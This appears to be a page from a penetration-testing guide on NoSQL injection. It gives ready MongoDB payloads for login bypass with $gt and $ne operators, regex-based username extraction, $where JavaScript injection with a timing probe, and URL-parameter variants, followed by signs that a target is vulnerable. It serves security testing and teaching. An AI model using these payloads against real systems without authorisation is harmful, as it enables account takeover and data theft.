NoSQL Injection


CWE	CWE-943
Tools	sqlmap, ghauri
Difficulty	🟡 intermediate

Exploiting NoSQL Injection

When the target uses a document store (MongoDB, CouchDB, etc.) instead of a relational database, traditional SQL payloads will not work. Test for NoSQL injection using operator injection and JavaScript injection.

MongoDB Operator Injection

Test JSON objects for MongoDB query operators:

// Authentication bypass
{"username": {"$gt": ""}, "password": {"$gt": ""}}
{"username": {"$ne": ""}, "password": {"$ne": ""}}
{"username": "admin", "password": {"$ne": "wrongpassword"}}

// Regex-based extraction
{"username": {"$regex": "^a"}, "password": {"$gt": ""}}
{"username": {"$regex": "^ad"}, "password": {"$gt": ""}}
{"username": {"$regex": "^adm"}, "password": {"$gt": ""}}

MongoDB JavaScript Injection

// In $where clauses
{"$where": "this.username == 'admin'"}
{"$where": "1==1"}
{"$where": "sleep(5000)"}  // Time-based detection

URL Parameter Injection

Some applications pass URL parameters directly to MongoDB queries:

?username[$gt]=&password[$gt]=
?username[$ne]=invalid&password[$ne]=invalid
?username[$regex]=.*&password[$regex]=.*

Detection Indicators

Application uses Node.js/Express with MongoDB (check headers, error messages)
JSON request bodies with nested objects
Error messages referencing BSON, MongoDB, or document operators
Different behavior when sending {"$gt": ""} vs a plain string value

Exploiting NoSQL Injection​

MongoDB Operator Injection​

MongoDB JavaScript Injection​

URL Parameter Injection​

Detection Indicators​

Exploiting NoSQL Injection

MongoDB Operator Injection

MongoDB JavaScript Injection

URL Parameter Injection

Detection Indicators